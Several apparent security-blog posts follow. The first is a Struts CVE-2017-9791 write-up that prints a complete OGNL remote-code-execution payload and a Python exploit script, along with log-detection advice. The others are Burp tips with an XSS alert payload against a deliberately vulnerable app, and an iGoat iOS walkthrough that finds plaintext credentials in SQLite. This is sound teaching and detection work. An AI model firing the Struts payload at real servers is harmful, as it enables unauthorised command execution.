
CVE-2017-9791 exploit details

I was looking back through some of my notes and came across this write-up I did for a Struts exploit. Nothing crazy, but what I liked about these notes is the detection angle: what defenders could have alerted on when this exploit came out. Enjoy!

Confirmed, publicly released exploits for CVE-2017-9791 allow remote code execution with the privileges of the web server. In recent vulnerabilities involving Struts and other frameworks, most organizations appear to follow the best practice of running the web server without admin or root privileges, but of course this needs to be confirmed on a case-by-case basis.

The vulnerable functionality in Struts 2.3.x and below lives in struts2-showcase, a sample application that ships with the Struts distribution. It is not deployed by default, so someone would have to intentionally deploy it. Below is a screenshot showing it deployed.

Below is a screenshot of the vulnerable functionality within Showcase.

The URL to access this functionality is http://hostname.com/struts2-showcase/integration/editGangster.action. Once there, you can fill out the forms and submit the request to test the working example. When that request is submitted it goes to the server as a POST request.

POST /struts2-showcase/integration/saveGangster.action

Knowing whether these URLs exist is one way of determining if the underlying Struts system is vulnerable, as Struts 2.5.x does not contain this functionality. Struts 2.5.x still ships the struts2-showcase application but not the Struts 1 plugin. In comparing the downloads of different Struts versions, only the ones containing the “struts2-struts1-plugin” JAR file were vulnerable.

So if the vulnerable application isn’t deployed but you have access to the web server’s file system, checking for the struts2-struts1-plugin JAR file is another way of confirming whether the underlying system could be exposed in the future.
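If you want to script both checks, a quick sketch is below (Python 3, standard library only). It probes for the showcase action over HTTP and greps the webapps directory for the Struts 1 plugin JAR; the host, port, and webapps path are placeholders you’d swap for your own environment, not values from this engagement.

import glob
import urllib.error
import urllib.request

HOST = "http://192.168.142.216:8080"        # placeholder target
WEBAPPS = "/var/lib/tomcat/webapps"         # placeholder Tomcat webapps directory

# Check 1: is the vulnerable showcase action reachable?
try:
    code = urllib.request.urlopen(HOST + "/struts2-showcase/integration/editGangster.action").status
except urllib.error.HTTPError as err:
    code = err.code
except urllib.error.URLError:
    code = None
print("editGangster.action reachable" if code == 200 else "showcase action not found")

# Check 2: is the Struts 1 plugin JAR present anywhere under webapps?
jars = glob.glob(WEBAPPS + "/**/struts2-struts1-plugin*.jar", recursive=True)
print("struts2-struts1-plugin JAR(s):", jars or "none found")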

We used publicly known techniques to confirm that exploitation was possible, similar to the posting at https://github.com/nixawk/labs/issues/8. A specially crafted request with a proof of concept that executes the command whoami can be seen below.

The request has to be URL encoded, but the decoded version is below.

POST /struts2-showcase/integration/saveGangster.action HTTP/1.0
Content-Length: 1187
Host: 192.168.142.216:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Python-urllib/2.7

name=%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=1337&__checkbox_bustedBefore=true&description=blah

Here is the exploit being run from the command line via a Python script.
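I’m not reproducing the original script here, but a minimal sketch of what such a script can look like is below (Python 3, standard library only). The target URL and whoami payload are the same ones from the decoded request above; the variable names and lack of error handling are just my illustration, not the exact script that was run.

import urllib.parse
import urllib.request

TARGET = "http://192.168.142.216:8080/struts2-showcase/integration/saveGangster.action"

# OGNL payload from the decoded request above; runs "whoami" on Windows or *nix.
OGNL = ("%{(#_='multipart/form-data')."
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm)))).(#cmd='whoami')."
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

# URL-encode the form fields exactly as the browser would.
data = urllib.parse.urlencode({
    "name": OGNL,
    "age": "1337",
    "__checkbox_bustedBefore": "true",
    "description": "blah",
}).encode()

req = urllib.request.Request(TARGET, data=data,
                             headers={"Content-Type": "application/x-www-form-urlencoded"})
print(urllib.request.urlopen(req).read().decode())  # command output comes back in the response body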

If logging is enabled within Tomcat, it will have the individual URL requests. On Windows these logs are located in c:\Program Files (x86)\Apache Software Foundation\Tomcat\logs, with the log named localhost_access_log.date. A snippet of these logs is below, with the last request being the saveGangster.action request.

192.168.142.216 - - [08/Jul/2017:20:03:51 -0400] "GET / HTTP/1.1" 200 11418
192.168.142.216 - admin [08/Jul/2017:20:03:53 -0400] "GET /manager/html HTTP/1.1" 200 12398
192.168.142.216 - admin [08/Jul/2017:20:04:40 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=817A45627CEDACBC2F98D9BF3B598839 HTTP/1.1" 200 14179
192.168.142.128 - admin [08/Jul/2017:20:04:55 -0400] "GET /manager/html HTTP/1.1" 200 14179
192.168.142.128 - - [08/Jul/2017:20:04:55 -0400] "GET /manager/images/tomcat.gif HTTP/1.1" 304 -
192.168.142.128 - - [08/Jul/2017:20:04:55 -0400] "GET /manager/images/asf-logo.svg HTTP/1.1" 304 -
192.168.142.128 - - [08/Jul/2017:20:05:00 -0400] "GET /struts2-showcase/index.action HTTP/1.1" 200 10870
192.168.142.128 - - [08/Jul/2017:20:05:00 -0400] "GET /struts2-showcase/struts/utils.js HTTP/1.1" 200 4730
192.168.142.128 - - [08/Jul/2017:20:05:07 -0400] "GET /struts2-showcase/integration/editGangster.action HTTP/1.1" 200 12001
192.168.142.128 - - [08/Jul/2017:20:05:07 -0400] "GET /struts2-showcase/struts/xhtml/styles.css HTTP/1.1" 200 1093
192.168.142.128 - - [08/Jul/2017:20:05:07 -0400] "GET /struts2-showcase/struts/utils.js HTTP/1.1" 200 4730
192.168.142.128 - - [08/Jul/2017:20:10:16 -0400] "POST /struts2-showcase/integration/saveGangster.action HTTP/1.1" 200 11408

This remote code execution exploit has been proven to work on both Windows and *nix systems. For detection purposes, simply looking for gangster.action in logs would be a great indicator of malicious activity, but it is not the end-all-be-all. There are different styles of payloads that can be used to take advantage of this vulnerability, so a combination of gangster.action plus OGNL functionality plus OS-style commands will be a better indicator of malicious activity.
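As a rough illustration of that detection idea (my own sketch, not a vetted rule), the snippet below flags any request to a *Gangster.action URL and calls out OGNL and OS-command markers if they appear in the logged line. Note the standard access log only records the URL, so payload markers will only show up if fuller request logging is in place; the log file name and indicator lists are assumptions.

import re

ACCESS_LOG = "localhost_access_log.2017-07-08.txt"   # hypothetical file name
OGNL_MARKERS = ("#context", "OgnlContext", "_memberAccess", "ognlUtil", "ProcessBuilder")
CMD_MARKERS = ("cmd.exe", "/bin/bash", "/bin/sh", "whoami")

with open(ACCESS_LOG, errors="replace") as fh:
    for line in fh:
        # Any hit on the showcase gangster actions is worth a look on its own.
        if not re.search(r"gangster\.action", line, re.IGNORECASE):
            continue
        hits = [m for m in OGNL_MARKERS + CMD_MARKERS if m.lower() in line.lower()]
        severity = "HIGH" if hits else "REVIEW"
        print(f"{severity}: {line.strip()}  indicators={hits}")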



Burp suite tip / tutorial: renaming tabs

This will be a quick and simple tip that you may not have been aware of: you can rename tabs within Burp. A friend of mine who works out of Raleigh turned me on to this. I find new, sometimes obvious, hidden features in Burp all the time and this is one of them.

I find this feature handy, especially in a large application, as I can easily keep track of what I’m testing. I use the tab renaming on the Repeater and Intruder functionality. To rename a tab, simply double-click it, which will allow you to edit its name.

Repeater before

Repeater after

Intruder before

Intruder after

Hope this simple tip helps you perform better application pen testing.


Burp suite tutorial / tip: using intercept to locate automated scanner findings

So here is a problem I have in my job, and maybe others do as well: when assessing a web application for vulnerabilities, you want to throw automated tools at it first to get the low-hanging fruit. You get the results back and you have some good findings, but you’re not exactly sure where each finding resides inside the application, meaning first click here, then here, then here, and modify parameter X. Knowing this isn’t crucial, because with Burp or any decent web proxy we can replay the request to retrieve and prove the vulnerable results, but when dealing with laymen and even developers you have to hand-hold them through the exploitation process via the browser as much as possible, hence the need to know where in the application the vulnerability exists.

In big applications, simply knowing what GET or POST request is vulnerable may not tell you where the vulnerability lies. Let’s say the scanner reports back that http://example.com/xskw/requestID?=blah is vulnerable; this is a generic URL without much context, so it’s not obvious where you would have to browse to stumble upon that request. It’s even worse for POST requests, because going directly to the URL without the parameters can produce errors within the application.

Let’s walk through an example of using the Burp intercept feature to find where scanner results are located. I’ll be using an intentionally vulnerable web application named Peruggia, found within the owaspbwa project, which is a great project for learning web app testing. I ran the active scan against Peruggia and got the following results.

I’m going to focus on the highlighted cross-site scripting vulnerability in the screenshot above. I picked this request for a number of reasons, but first let’s take a look at the details of the request below.

Here we see it’s a POST request, and I wanted to focus on a POST request because of some of the challenges these requests present. In the top third of the tab we see the response was redirected, which means we’ll get a 302 status code. If you were to copy and paste the URL into the browser and make that request, you’d be redirected to the home page. That is the nature of POST requests: we can’t just put the URL into the address bar and be taken to that location. Because of this, it can be hard to determine where in the application the vulnerability exists. Especially for XSS (cross-site scripting) vulnerabilities, I like to obtain screenshots of the alert box to prove to the customer that I was able to exploit the vulnerability. With a GET request this is easier, but POST requests add a level of difficulty.

Let’s walk through an example to understand the challenges. I’ll be starting out on the about page of the Peruggia application. Next I’ll paste the URL from the XSS finding into the address bar.

After I enter this request I get redirected to the home page.

This is also reflected in Burp, where we see the 302 redirect status code that sends us back to the home page.

So the challenge is to find that “comment” parameter that Burp flagged as vulnerable, and without a simple GET request this can be difficult. I didn’t pick the greatest example, because the “comment” parameter shouldn’t be that hard to find in this application: it’s fairly small and the parameter actually provides some context (adding a comment), which doesn’t always happen. So for this example let’s ignore the big comment box on the home page and pretend we didn’t see it.

We’ll now set up a rule inside the proxy intercept to alert us when we stumble across the vulnerable “comment” parameter. Let me explain the term stumble for a second. When I get a result back from a scanner and I’m not sure where it’s located inside the application, I’ll typically start walking the application and monitor my proxy history to see if that parameter was passed within a request. This can be a pain in the butt, so setting up a proxy intercept rule can help automate the process. The rule is somewhat counterintuitive because we’ll leave the intercept on the entire time and let it catch when it sees our parameter. In this case we’ll disable the default file extension match rule and add a new rule to look for the parameter in question. Below is the rule I set up to catch the vulnerable parameter “comment”.

Now the next thing is to start browsing / walking the application, and the proxy intercept will automatically alert you when you come across the vulnerable parameter. So while walking the application I decide to post a comment on a picture to ensure I’m touching every piece of functionality. My intercept is on, with my new rule waiting to flag the vulnerable parameter.

After I make this request my proxy starts blinking and alerting me to the fact that I’ve come across the “comment” parameter.

Unfortunately, for large applications it may take some time before you stumble upon the vulnerable parameter, but hopefully this will help you pinpoint the location of automated findings. Of course, once we’ve found the vulnerable parameter that the automated scanner flagged, we’ll want to capture a screenshot of the exploit, and in this case we’ll need to document that we’re able to execute JavaScript inside the application. So now I’ll capture that POST request again and insert the classic JavaScript alert message.
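If you’d rather script the replay than drive it through Repeater, a small sketch is below. The Peruggia endpoint and form fields here are placeholders; pull the real ones from the flagged request in your proxy history. Only the “comment” parameter comes from the finding above.

import urllib.parse
import urllib.request

# Placeholder endpoint - take the real path and parameters from the flagged
# request in your proxy history; only "comment" is from the scanner finding.
url = "http://192.168.1.10/peruggia/index.php?action=comment"
payload = "<script>alert('XSS')</script>"            # the classic alert proof of concept

data = urllib.parse.urlencode({"comment": payload}).encode()
body = urllib.request.urlopen(urllib.request.Request(url, data=data)).read().decode(errors="replace")

# If the payload comes back unencoded, replaying the same request in the browser
# (or from Burp Repeater) will pop the alert box for the screenshot.
print("reflected unencoded" if payload in body else "not reflected / encoded")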

And now the alert message, proving to the application owners, developers, and customers that executing JavaScript is possible.

XSS FTW. Hopefully this small tip will help you hunt down where in the application an automated finding resides. Happy bug hunting.


Security testing iPhone – local data storage

One of the areas you need to focus on when performing security / penetration testing on iOS applications is what information is written to disk or stored locally. There are a number of things that can be written to disk (text files, config files, plist files, databases, etc.). There are also a handful of directories that an application typically uses to store local data on an iOS device, which you’ll need to keep in mind when combing through the local file system. I’ll cover these directories and walk through an iOS application security assessment.

The application we’ll walk through is iGoat, an intentionally vulnerable application written for iPhone / iOS devices. The iGoat application can be run inside the iOS Simulator, which is free to use assuming you have an Apple OS X device. I’m not going to walk through setting up the iGoat application within the simulator; please check online resources for getting iGoat up and running. Once it’s running, go to “Data Protection (Rest)” > “Local Data Storage” and start the exercise. You’ll notice the exercise describes that it’s using an underlying SQLite database to store information; keep in mind you won’t normally know this. Initially, when performing a security test on an iOS application, you won’t know if data is being stored locally; it could be storing all information server side. If it does store data locally, it can be in a number of locations and in different formats, such as a SQLite database. Once you start the iGoat data storage exercise you should come to the following screen.

At this point just put in a fake username and password; I’ll choose username “super” and password “secret”. After you click “Login” nothing will happen; this isn’t meant to be a full-blown application. So the application took input from the user, but what happened to that information? The iOS Simulator is no substitute for an iOS device, but the behavior of the application remains the same, meaning that if you’re testing an application in the simulator on your MacBook and the application stores local data, then that data will be stored in some location on your MacBook. The application data is typically stored in the following location on your OS X device.

/Users/travis/Library/Application Support/iPhone Simulator/5.1/Applications/UID

Here UID is a unique identifier for the installed application, and of course you’ll substitute my name with your username in the “Users” directory. My UID in this case is “8813AE1B-3FC7-4503-99D0-666E974A74D7”. If you open up Finder in OS X and try to navigate to the Library directory you won’t see it because it’s hidden. You can enable the viewing of hidden files and folders, but I’ll be navigating via the Terminal, which is in the Utilities folder under Applications. Once in the UID directory, run “ls -lh” to see the files and directories the application is utilizing.

mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$ ls -lh
total 0
drwxr-xr-x   4 travis  staff   136B Sep 27 19:08 Documents
drwxr-xr-x   5 travis  staff   170B Jul 11 09:50 Library
drwxr-xr-x  28 travis  staff   952B Sep 25 21:44 iGoat.app
drwxr-xr-x   2 travis  staff    68B Jul 10 21:37 tmp

Here we see four directories (Documents, Library, iGoat.app, and tmp). We know they’re directories because each line begins with a “d”; if it wasn’t a directory you would just see a “-” dash. These are the four main directories you’ll have for each application, with iGoat.app replaced by whatever application you’re testing (e.g. AppName.app). When looking for items of interest during security testing, one should focus on these four directories; listed below is a chart showing the type of information that can be found in them.

The contents and locations are not set in stone, but these are the best places to start. So now you know where files may be stored locally on an iOS device, but what’s the best way to discover the files we’re interested in? Let’s use what we know in this case: the application tells us that it stores login information in a SQLite database. Normally you’re not going to know that an application uses a SQLite database to store information unless you’re in close communication with its developers. For now we know the app uses a SQLite database, so let’s search through these directories looking for that file. We could do this manually, but I think dropping to a command prompt is always best. Use the “find” command to locate any SQLite databases; the command is below.

mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$ find . -name *.sqlite
./Documents/credentials.sqlite
./iGoat.app/articles.sqlite
mac:8813AE1B-3FC7-4503-99D0-666E974A74D7 travis$

From the output of the find command we’ve located two SQLite databases for this application, credentials.sqlite and articles.sqlite. Credentials.sqlite is the obvious place to start. There are multiple ways to view that sqlite file, but the two I prefer are the SQLite Database Browser and the command line utility sqlite3. I’ll be sticking with the sqlite3 command to give you a different perspective, as the SQLite Database Browser is GUI based and easier to use. One thing to note with the GUI tool is that it can’t browse hidden directories, so you’ll have to copy the sqlite database from the “hidden” Documents directory into a directory that the GUI tool can navigate to. Next, open the sqlite database with the command below.

travis@mac:Documents$ sqlite3 credentials.sqlite
SQLite version 3.7.14 2012-09-03 15:42:36
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite>

You’ll be presented with an sqlite prompt. Next, issue the “.tables” command at that prompt.

sqlite> .tables
creds

Here we see a “creds” table; to view the contents of that table use the “.dump” command.

sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT);
INSERT INTO "creds" VALUES(1,'super','secret');
DELETE FROM sqlite_sequence;
INSERT INTO "sqlite_sequence" VALUES('creds',1);
COMMIT;

Here we see in the first INSERT statement the values of the username and password that we typed into the application. So the vulnerability is that credentials to the application are stored in plain text, and if someone were to remotely or locally gain access to the iPhone they could glean these credentials. It’s always best, if possible, to store credentials server side, and if you must store credentials locally, encrypt that information. This goes for any sensitive information stored locally (text files, config files, plist files, etc.). I could extend this example to those types of files, but the same concept applies. So if you’re curious about one of your iOS apps, check out those locations, and if you develop iOS applications make sure you store local sensitive information in an encrypted format.
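If you want to automate that check across an app, here’s a quick sketch that walks the app’s simulator directory, finds any SQLite databases, and dumps every table so plaintext secrets stand out. The base path is the simulator layout shown earlier; adjust it for your own username, simulator version, and app UID.

import os
import sqlite3

# Base path from the simulator layout shown earlier - adjust the username,
# simulator version, and application UID for your own setup.
APP_DIR = ("/Users/travis/Library/Application Support/iPhone Simulator/5.1/"
           "Applications/8813AE1B-3FC7-4503-99D0-666E974A74D7")

for root, _dirs, files in os.walk(APP_DIR):
    for name in files:
        if not name.endswith(".sqlite"):
            continue
        path = os.path.join(root, name)
        print("==", path)
        con = sqlite3.connect(path)
        tables = [row[0] for row in
                  con.execute("SELECT name FROM sqlite_master WHERE type='table'")]
        for table in tables:
            print("--", table)
            for row in con.execute(f"SELECT * FROM {table}"):  # table names come from the db itself
                print(row)
        con.close()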

Feel free to comment with questions or concerns.